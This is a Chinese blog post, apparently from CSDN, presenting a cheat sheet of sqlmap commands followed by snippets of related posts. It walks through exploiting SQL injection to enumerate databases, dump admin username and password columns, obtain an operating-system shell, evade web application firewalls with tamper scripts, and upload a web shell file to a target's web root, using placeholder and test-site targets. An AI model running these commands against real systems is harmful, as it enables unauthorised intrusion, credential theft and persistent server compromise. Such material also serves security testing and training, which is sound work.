sqlmap指定cookie_SQLmap

最新推荐文章于 2024-07-24 15:27:34 发布
最新推荐文章于 2024-07-24 15:27:34 发布
阅读量581 收藏
点赞数 1
文章标签: sqlmap指定cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_26812607/article/details/113542609
版权
本文详细介绍了sqlmap工具的使用,包括如何指定cookie进行注入测试,不同类型的SQL注入攻击方法,如Access注入、MySQL数据库注入、Cookie注入和POST表单注入。还提到了如何应对Web防注入措施、绕过WAF防火墙以及利用tamper脚本。此外,还讨论了获取系统交互shell、伪静态注入和请求延时的处理策略。
摘要由CSDN通过智能技术生成

**参数解释**

星号

在注入的过程中,有时候是伪静态的页面,可以使用星号表示可能存在注入的部分

--data

使用post方式提交的时候,就需要用到data参数了

-p

当我们已经事先知道哪一个参数存在注入就可以直接使用-p来指定,从而减少运行时间

--level

不同的level等级,SQLMAP所采用的策略也不近相同,当–level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数;当–level参数设定为3或者3以上的时候,会尝试对User-Angent,referer进行注入。

--random-agent

使用该参数,SQLMAP会自动的添加useragent参数,如果你知道它要求你用某一种agent,你也应当用user-agent选项自己指定所需的agent

--technique

这个参数可以指定SQLMAP使用的探测技术,默认情况下会测试所有的方式。

支持的探测方式如下:

B: Boolean-based blind SQL injection(布尔型注入)

E: Error-based SQL injection(报错型注入)

U: UNION query SQL injection(可联合查询注入)

S: Stacked queries SQL injection(可多语句查询注入)

T: Time-based blind SQL injection(基于时间延迟注入)

**Access注入**

sqlmap -u 注入点url //判断是否有注入

sqlmap -u 注入点url --tables //access直接猜表

sqlmap -u 注入点url --colums -T admin //爆出admin表,猜解它的字段

sqlmap -u 注入点url --dump -T admin -C "username,password" //猜字段内容

**MySQL数据库注入**

sqlmap -u url --dbs //获取数据库

sqlmap -u url -D 指定的数据库 --tables //获取数据库中的表

sqlmap -u url -D 指定的数据库 -T 表名 --columns //获取表字段

sqlmap -u url -D 指定的数据库 -T 表名 -C id,user,pass --dump //获取字段内容

**Cookie注入**

网站有判断,不让用and,update等参数时就得加上Cookie。

sqlmap -u url --cookie="cookie值" --dbs(或)--tables --level 2

**POST表单注入**

注入点:

http://testasp.vulnweb.com/Login.asp

**几种方式:**

sqlmap -r burp拦截数据.txt -p Pass(测试参数) //从文件读取数据包

sqlmap -u http://testasp.vulnweb.com/Login.asp --forms //自动搜索表单

sqlmap -u http://testasp.vulnweb.com/Login.asp --data "Name=1&Pass=1" //手动添加数据

**获取系统交互shell**

1.sqlmap -u http://url.. --os-shell //或者windows可以用--os-cmd 或--sql-shell

2.选择网站服务端语言

3.填写网站根目录C:/www/

**伪静态注入**

sqpmap -u http://victim.com/id/666*.html --dbs //在html扩展名前加个'*'

**请求延时**

Web防注入措施,在访问两次错误页面后,第三次必须访问正确的页面

--delay 2 //延时两秒访问

--safe-freq 30 //人为配置次数

**绕过WAF防火墙**

sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch

--tamper "space2morehash.py" //使用tamper脚本绕过

类似脚本

space2hash.py base64encode.py charencode.py

**file参数使用**

必须为dba权限

sqlmap -u url --is-dba //查看是否dba权限

sqlmap -u url --file-write=本地木马路径(D:/shell.php)

--file-dest=目标根目录(C:/www/shell.php)

**常用tamper脚本使用**

地址:http://mp.weixin.qq.com/s/vEEoMacmETUA4yZODY8xMQ

姚令武
关注
sqlmap指定cookie_SQLMap使用
weixin_39628041的博客
01-30 2062
SQLMapsqlmap是一款SQL注入漏洞测试工具,支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。常用参数​注意:必须指定至少一个目标-u#指定URL,必须使用双引号包含url--...
sqlmap指定cookie_sqlmap使用
weixin_42128393的博客
01-30 1460
kali中sqlmap的使用sqlmap简介:SQLmap是一个自动化的SQL注入攻击,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持Mysql、Oracle、MS-SQL、PostgreSQL与Access等数据库。SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包含数据库指纹、枚举、数据库提取,访问...
sqlmap指定cookie_sqlmap
weixin_35732273的博客
01-30 230
sqlmap的一些使用技巧-v 3 显示注入过程的payload-d 直连数据库-u 检测sql注入-l log文件,可以是burp等代理的log文件-m target.txt 多个url检测-r 可将post请求方式保存在一个txt中,sqlmap通过post方式检测目标-g 使用google引擎 -g “inurl:\”.php”--data=DATA 指明参数是哪些(以post形式提交,并检...
SQL labs-SQL注入(五,使用sqlmap进行cookie注入)
最新发布
2302_80280669的博客
07-24 588
Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":当用户访问 web 页面时,他的名字可以记录在 cookie 中。在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。
sqlmap指定cookie_sqlmap处理cookie数据
weixin_34061793的博客
12-24 1904
Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在web应用中至关重要,用户的唯一标识session id也是存在cookie中的。那么,在sqlmap使用的时候,也会经常需要考虑到cookiesqlmap也提供了和cookie相关的命令,本文将会介绍。1. cookie保存了用户登录状态很多网站的功能都是需要登陆后才能访问,而http本身是无状态的,因此服务器...
sqlmap指定cookie_注入工具 -- sqlmap(指定位置注入和优化性能)
weixin_33618482的博客
01-10 415
一、指定位置注入1、-p,指定具体探测的参数sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p "id,name" --dbs 对id和name都进行探测2、--skip,忽略探测...
sqlmap指定cookie
06-11
要使用 SQLMap 指定 Cookie,可以使用以下命令: ``` python sqlmap.py -u "http://example.com/page.php" --cookie="name=value; name2=value2" ``` 其中,`http://example.com/page.php` 是需要测试的网址,`...
sqlmap注入mysql_sqlmap注入系列(高级篇)
weixin_42107561的博客
01-30 977
前言:软件:burpsqlmap软件配置设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置漏洞环境安装数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt爆出数据库sqlmap -r "/root/22.txt" --dbs爆出表sqlmap -r "22.txt" -D lou --tables爆出表结构sqlmap -r "22.txt" -D lou -T u...
sqlmap的使用_sqlmap --force-ssl(2),2024年最新2024大厂网络安全知识点总结
2301_76225520的博客
04-18 449
sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。-d: 直接连接数据库 (-d “mysql://user:passward@地址:端口/数据库名称”)3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
sqlmap指定cookie_sqlmap语法
weixin_36295500的博客
12-24 192
原标题:sqlmap语法1)判断当前用户是否是dbapython sqlmap.py -u "url" --is-dba -v 12)--users:列出数据库管理系统用户python sqlmap.py -u "url" --users -v 03)--passwords:数据库用户密码(hash)python sqlmap.py -u "url" --passwords -v 0python ...
SQLMAP进阶使用 --cookie
Z_l123的博客
02-19 5861
实验原理 Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。 1.访问DVWA网站 1)访问dvwa,并登录。admin password 2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA
sqlmap应用之cookie参数
qq_44060093的博客
08-21 4713
访问dvwa,将级别调为low 步骤一:如果不带入cookie参数,直接sqlmap查询失败 SQLMAP直接使用url来进行注入,因为之前没有登录DVWA所以被重定向到login.php界面,直接注入失败 步骤二:使用burpsuit抓包工具,在sql注入菜单处提交参数请求时进行数据抓包,获取cookies值 用通用的url请求,在burp里面进行抓包,信息如图,已经获取了cookie值 发现sqlmap可以跑出数据来了,构造其他语句,继续查取数据 查找所有数据库 查找cms数据库下的表
sqlmap指定cookie_Sqlmap Cookie注入 教程
weixin_34891129的博客
01-14 1300
Sqlmap是什么我就不多说了,它就是一个渗透测试工具,主要是用来SQL注入的,支持很多种类型的数据库。用工具sqlmap来做cookie注入很简单,只需要用sqlmap cookie注入命令即可!具体操作如下:1、检测是否有cookie注入?root@Kali:~# sqlmap -u http://www.xxxxxx.com/Newsshow.asp --cookie "ID=212" --...
SQLmap————4、Cookie注入
Fly_鹏程万里
05-04 948
说明:默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 –level 2 即可!1、判断是否可以注入Sqlmap –u http://www.xxx.com/cookie/test.asp  -...
Sqlmap2021 -- Cookie注入
weixin_41489908的博客
07-07 4104
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
sqlmap指定cookie_SQLmapcookie注入测试
weixin_39568232的博客
12-24 820
最近公司系统在做安全方面的整改,有个接口可通过sql注入获取到用户数据库,进而获取到表及表结构信息。故,学习了sqlmap注入中cookie注入相关知识,并做以总结。这是对一个接口做的简单sql注入测试:经过多次尝试,最终用cookie注入测试:sqlmap.py-u “url地址” –cookie “requests里面的set-cookie信息” --tables--time-sec=2...
Sqlmap 设置请求参数
白菜执笔人的博客
02-26 3346
Web安全攻防 学习笔记 一、Sqlmap 设置 cookie 1.1、sqlmap 中用来设置 cookie 的参数 --cookie --cookie-del --load-cookies --drop-set-cookie # 如果 http 响应头中有 set-cookie 但是又不想使用其进行测试时, 可设置该参数 使用场景 web 应用程序具有基于 coo...
测试工具-sqlmap
weixin_42902126的博客
06-27 6089
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
手把手带你学习SQLMAP
2301_77147728的博客
03-22 732
表中的所有字段的内容,在这里可以清晰的看到user字段对应的password字段的值,这就是拖库的基本原理,学会了的给个赞。后面一系列的黑科技,由于权限不够,暂时就不分析了,下次有机会咱们再碰一碰。相反,这也说明了权限的重要性。可以看到这里咱们的Cookie是,security=medium表示咱们现在处于中级模式。美滋滋,成功了,抓包重放,屡试不爽,学会的给个赞~这里可以看到,咱们这个漏洞靶场使用的数据库是。选哪张表,你可以看当时自己的心情。可以看到这里咱们的Cookie是,数据库里面,我们获得到。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值